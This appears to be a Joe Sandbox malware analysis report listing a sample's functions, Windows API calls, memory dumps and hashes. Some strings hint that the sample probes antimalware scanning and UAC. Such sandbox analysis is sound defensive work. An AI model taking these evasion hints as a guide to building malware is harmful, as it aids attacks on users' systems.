                                                                                                                                            • RegCloseKey.ADVAPI32(000005DC,000005DC,00000000,00000000,00000001,00000000,0000001C,00000000,027CEBA3), ref: 027CEB7B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseOpenValue
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 779948276-0
                                                                                                                                            • Opcode ID: 1ffe7bbfdfecb051aef399134ff054469913a9f17ea86f00770158cb00717723
                                                                                                                                            • Instruction ID: 9664c09b9ced8d7fe2a1e97240bef8bce4da1e149962044259144681bba903ef
                                                                                                                                            • Opcode Fuzzy Hash: 1ffe7bbfdfecb051aef399134ff054469913a9f17ea86f00770158cb00717723
                                                                                                                                            • Instruction Fuzzy Hash: C1110A71A04208AFEB03EFA8D8A5EAE7BEDEF09710F600464F515DB651D730DA618B64
                                                                                                                                            Function 027BE2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ClearVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                            • Opcode ID: 91aaa2547065cef1a43c9d867f1c80931dd7a26fc4ad9f7d693cac2828ea505a
                                                                                                                                            • Instruction ID: 377f72b8182acdaa35d2fd54ade2bf490707b8ecc0110334277be581cea5b686
                                                                                                                                            • Opcode Fuzzy Hash: 91aaa2547065cef1a43c9d867f1c80931dd7a26fc4ad9f7d693cac2828ea505a
                                                                                                                                            • Instruction Fuzzy Hash: BCF06265708210CB9B277B398DC87EE2BDA5F44710BD4543AE406AB356CB288C45CB62
                                                                                                                                            Function 027B4CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            • SysAllocStringLen.OLEAUT32(?,?), ref: 027B4D07
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 027B4D19
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$Free$Alloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 986138563-0
                                                                                                                                            • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                                            • Instruction ID: 2e5178c88adb7ebfb3bec22e3f22c972f7145c88ebdae38cce61a4c10845f788
                                                                                                                                            • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                                                                                                                            • Instruction Fuzzy Hash: 77E012B86062015EEF1B2F219C74BF7372AAFC1B41B544899A904CA151D734C441AD34
                                                                                                                                            Function 027C705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 027C735A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3341692771-2852464175
                                                                                                                                            • Opcode ID: 4a4fea37b0728f80e91db42ee85e4aa6258e1b5881dab3aa2bc5fbae3edaafea
                                                                                                                                            • Instruction ID: 82bbe4203ee0123c241bb79fd5ed3d01ecba1b9e6b7c94ef469642c74d4dd853
                                                                                                                                            • Opcode Fuzzy Hash: 4a4fea37b0728f80e91db42ee85e4aa6258e1b5881dab3aa2bc5fbae3edaafea
                                                                                                                                            • Instruction Fuzzy Hash: 26B1C175A016089FDB15CFA9D880A9DFBF6FF89314F248169E805AB364DB30A845CF50
                                                                                                                                            Function 027BE6E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantCopy.OLEAUT32(00000000,00000000), ref: 027BE701
                                                                                                                                              • Part of subcall function 027BE2E4: VariantClear.OLEAUT32(?), ref: 027BE2F3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variant$ClearCopy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 274517740-0
                                                                                                                                            • Opcode ID: 09e1aecaa3ef96a8f4b5a4dca82aa62615705a09ee5529a43bf96794b218f0a5
                                                                                                                                            • Instruction ID: 690d813787b08ec3dd89b8eaaf7fb215a1f2e50d5dbfe4f9de574e4251f961b0
                                                                                                                                            • Opcode Fuzzy Hash: 09e1aecaa3ef96a8f4b5a4dca82aa62615705a09ee5529a43bf96794b218f0a5
                                                                                                                                            • Instruction Fuzzy Hash: DE1182247042119BCB37EF6AC8CCBE677D6AF46750784846AE64A9B746DB30CC00CBA1
                                                                                                                                            Function 027BE37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1927566239-0
                                                                                                                                            • Opcode ID: d1564dadc584ff380e87c6e6a0f59a0879e6db1a023b88532fe231111768b7f4
                                                                                                                                            • Instruction ID: 91429e8de762091d199ac3654876efde8a452c291d799f75a3068ed7bf515b68
                                                                                                                                            • Opcode Fuzzy Hash: d1564dadc584ff380e87c6e6a0f59a0879e6db1a023b88532fe231111768b7f4
                                                                                                                                            • Instruction Fuzzy Hash: 29311872A04219AFDF16DFA8C888BEE77A8EF09304F944565F905D3340D774DA90CBA6
                                                                                                                                            Function 027C6CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,00000000,027C6D39,?,?,?,00000000), ref: 027C6D19
                                                                                                                                              • Part of subcall function 027B4C0C: SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeFromProgString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4225568880-0
                                                                                                                                            • Opcode ID: 0fdb1921f890fe98979c84497e4fdd068b3659fa6b2a04f8562662d4da974fe1
                                                                                                                                            • Instruction ID: f4cc8191ffebca5e5fabb79590f82668c03effbd708598c3f53d60d1fd07e8d9
                                                                                                                                            • Opcode Fuzzy Hash: 0fdb1921f890fe98979c84497e4fdd068b3659fa6b2a04f8562662d4da974fe1
                                                                                                                                            • Instruction Fuzzy Hash: 0AE06575604304BFE713EBB6CC65A9A7BADDF89B10BA144B9E900D7601D6756D008860
                                                                                                                                            Function 027B5814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(027B0000,?,00000105), ref: 027B5832
                                                                                                                                              • Part of subcall function 027B5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027B0000,027DE790), ref: 027B5A94
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AB2
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027B0000,027DE790), ref: 027B5AD0
                                                                                                                                              • Part of subcall function 027B5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027B5AEE
                                                                                                                                              • Part of subcall function 027B5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027B5B37
                                                                                                                                              • Part of subcall function 027B5A78: RegQueryValueExA.ADVAPI32(?,027B5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027B5B7D,?,80000001), ref: 027B5B55
                                                                                                                                              • Part of subcall function 027B5A78: RegCloseKey.ADVAPI32(?,027B5B84,00000000,?,?,00000000,027B5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027B5B77
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2796650324-0
                                                                                                                                            • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                            • Instruction ID: 5a281d68bbcf981cc6c7350d524d1591d48b2db4243174863ef2177f7b32388b
                                                                                                                                            • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                            • Instruction Fuzzy Hash: 32E06571A002148FCB12DE6C88C5B8637D8AF08750F8009A5EC58DF34AD3B0D9208BE0
                                                                                                                                            Function 027B7D94 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027B7DA8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                            • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                            • Instruction ID: bccedfc1cfaed91113f998862a48955c029d616b281e0553793491c0fc191062
                                                                                                                                            • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                                                                                            • Instruction Fuzzy Hash: 66D05B723081107AD225955B5C44FFB5BDCCFC9770F100639B658C3280D7208C0187B1
                                                                                                                                            Function 027B7E34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,027D2E7D,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanBuffer,0281237C,027DB40C,OpenSession,0281237C,027DB40C,Initialize), ref: 027B7E3F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                            • Instruction ID: d071e1ac468825357d83f808fb4a789dbadd83d13a8731a49d233932a1ba8f91
                                                                                                                                            • Opcode Fuzzy Hash: fe3f8c7547375d3b190e2bd7b8d67a4577ec7d15bc45dec9ccb4955a6e8d04a7
                                                                                                                                            • Instruction Fuzzy Hash: 88C08CA62022040E2E67A2FC0CD87CE438C0E88238BA02F31F238C61D2D321D8623410
                                                                                                                                            Function 027B7E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,027CFD00,ScanString,0281237C,027DB40C,OpenSession,0281237C,027DB40C,ScanString,0281237C,027DB40C,UacScan,0281237C,027DB40C,UacInitialize), ref: 027B7E1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AttributesFile
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                            • Opcode ID: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                                                                                            • Instruction ID: a2e8037f3039e4682adc26d8c9752f95e1205cf38162b9d8baef0af62f4bf8c1
                                                                                                                                            • Opcode Fuzzy Hash: 23fb81311ad07fae81732db0edde70c56cded36c5311baf0953a0f48c8330ef0
                                                                                                                                            • Instruction Fuzzy Hash: C0C08CE62022020A1A6BA1FC0CC83EA43880E881383A42F35E238DA2E2D32188272420
                                                                                                                                            Function 027B4C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(027CED84), ref: 027B4C1A
                                                                                                                                            • SysReAllocStringLen.OLEAUT32(027DC2B4,027CED84,000000B4), ref: 027B4C62
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: String$AllocFree
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 344208780-0
                                                                                                                                            • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                            • Instruction ID: eebca76706f688746d0d2682e450e6ee88fffa76549eca06248fafda0f7cf48f
                                                                                                                                            • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                            • Instruction Fuzzy Hash: 2ED080745011015DDF2F9955457CBF7736A9DD060779CC69ED8028B343E731C400CA31
                                                                                                                                            Function 027B4C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3341692771-0
                                                                                                                                            • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                                            • Instruction ID: 83fba30a4afa7baf4a5f10a1f535f2c6235545f5feb2d4fdf9c128c25b0be45e
                                                                                                                                            • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                                            • Instruction Fuzzy Hash: D6C012A260122447EB235A989CE07D662CCDF05696B5400A1D408D7242E3609C004664
                                                                                                                                            Function 027DBF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • timeSetEvent.WINMM(00002710,00000000,027DBF78,00000000,00000001), ref: 027DBF94
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Eventtime
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2982266575-0
                                                                                                                                            • Opcode ID: 6c952d72d8d438e16efbc0fc00e5d71bf76a34c6ed82a937b8dd63d62ba8a39d
                                                                                                                                            • Instruction ID: 5f726550e116c114f958b94b09d71201779b45733147c3219ef3825cf4ab1b31
                                                                                                                                            • Opcode Fuzzy Hash: 6c952d72d8d438e16efbc0fc00e5d71bf76a34c6ed82a937b8dd63d62ba8a39d
                                                                                                                                            • Instruction Fuzzy Hash: A5C092F07C93407FFE1296B91CD2F77119DD714B02F211866BE00EE2C1D2E258604A24
                                                                                                                                            Function 027B4BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,?), ref: 027B4BEB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
                                                                                                                                            • Associated: 00000007.00000002.2131700334.00000000027B0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132053873.00000000027DE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132250802.0000000002812000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002906000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000007.00000002.2132310933.0000000002909000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_7_2_27b0000_brightness.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2525500382-0
                                                                                                                                            • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                            • Instruction ID: 4969393e092895f224978225157e1fd68d99897a00364d133f3ddad7d6e184ac
                                                                                                                                            • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                            • Instruction Fuzzy Hash: 0EB0922824820218EE1711620D30BF3008C0F50286F8400A19F28D8082EB00C0008832
                                                                                                                                            Function 027B4BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 027B4C03
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000007.00000002.2131732138.00000000027B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027B0000, based on PE: true
